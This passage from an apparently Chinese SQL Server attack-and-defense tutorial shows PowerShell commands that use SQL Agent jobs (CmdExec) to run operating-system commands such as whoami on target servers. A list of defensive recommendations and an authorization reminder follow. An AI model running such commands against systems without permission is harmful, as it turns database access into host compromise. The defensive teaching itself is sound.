-Command "Whoami"<\/span> <\/span><\/span> <\/span><\/span># Agent Job执行命令<\/span> <\/span><\/span>$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\temp\test.txt"<\/span> <\/span><\/span><\/code><\/pre>十、防御建议<\/h2> 最小权限原则<\/strong>：应用程序账户使用最低必要权限<\/li> 禁用危险组件<\/strong>：禁用xp_cmdshell、Ole Automation Procedures等<\/li> 输入验证<\/strong>：对所有用户输入进行严格过滤<\/li> 错误处理<\/strong>：自定义错误页面，避免泄露系统信息<\/li> 定期审计<\/strong>：检查存储过程和扩展存储过程的使用情况<\/li> 更新补丁<\/strong>：及时安装SQL Server安全更新<\/li> 网络隔离<\/strong>：限制SQL Server的网络访问权限<\/li> 日志监控<\/strong>：启用并监控SQL Server的登录和操作日志<\/li> <\/ol> 通过本指南，您已全面掌握SQL Server从基础到高级的攻防技术。请务必在合法授权范围内使用这些技术，并加强自身系统的安全防护。<\/p>